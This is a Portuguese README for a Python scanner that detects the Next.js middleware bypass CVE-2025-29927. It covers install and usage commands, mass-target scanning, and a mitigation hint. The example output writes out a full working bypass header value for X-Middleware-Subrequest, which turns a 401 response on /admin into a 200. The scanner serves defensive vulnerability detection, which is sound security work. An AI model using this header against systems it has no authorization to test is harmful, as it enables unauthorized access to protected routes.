
Next.js Middleware Bypass Scanner
CVE-2025-29927 é uma ferramenta de segurança especializada para detectar a vulnerabilidade de desvio de middleware do Next.js (CVE-2025-29927) que afeta as versões 11.1.4 a 15.2.2 do Next.js. Esta vulnerabilidade crítica permite que atacantes burlem os controles de segurança enviando um cabeçalho HTTP especialmente criado.
A vulnerabilidade de desvio de middleware do Next.js (CVE-2025-29927) permite que atacantes contornem os controles de autorização enviando um cabeçalho malicioso X-Middleware-Subrequest que confunde a lógica de processamento do middleware. Isso pode levar ao acesso não autorizado a recursos e rotas protegidos.
Pontuação CVSS: 9.1 (Crítico)
# Clone o repositório
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927
# Instale os requisitos
pip install -r requirements.txt
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
-t, --target: Alvo único para varredura (ex.: example.com ou https://example.com)-f, --file: Arquivo contendo lista de alvos (um por linha)-c, --concurrency: Número de varreduras simultâneas (padrão: 5)-k, --insecure: Desabilitar verificação de certificado SSL (útil para endereços IP)-s, --silent: Modo silencioso - mostrar apenas alvos vulneráveisEscaneie um único alvo:
python CVE-2025-29927.py -t example.com
Escaneie múltiplos alvos de um arquivo:
python CVE-2025-29927.py -f targets.txt
Escaneie com verificação SSL desabilitada:
python CVE-2025-29927.py -t 192.168.1.1 -k
Varredura automatizada com modo silencioso:
python CVE-2025-29927.py -f targets.txt -k -s
Escaneie com um cabeçalho personalizado:
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
Para alvos vulneráveis, o MiddleWay exibe:
Exemplo de saída:
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
Original status: 401
Bypassed status: 200
Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
Para mitigar esta vulnerabilidade:
X-Middleware-Subrequest no nível do seu WAF ou servidorEsta ferramenta é fornecida apenas para fins de pesquisa em segurança e defesa. Sempre obtenha autorização adequada antes de escanear sistemas que você não possui. Os autores não são responsáveis por qualquer uso indevido desta ferramenta.
MIT